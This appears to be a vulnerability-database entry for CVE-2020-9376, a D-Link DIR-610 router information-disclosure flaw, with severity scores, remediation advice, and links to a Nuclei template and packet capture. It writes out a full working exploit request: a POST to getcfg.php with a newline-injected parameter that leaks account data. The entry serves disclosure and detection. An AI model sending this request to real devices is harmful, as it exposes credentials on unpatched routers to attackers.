| Title | D-Link DIR-610 Devices - Information Disclosure |
|---|---|
| Author | whynotke |
| Severity | High |
| Impact | An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks. |
| Remediation | Apply the latest firmware update provided by D-Link to fix the vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.92258 |
| CVE ID | CVE-2020-9376 |
| CWE ID | CWE-74 |
| Tags | cve cve2020 dlink disclosure router vuln |
D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
POST /getcfg.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Connection: close
Content-Length: 44
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-9376.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-9376.pcap
N/AN/A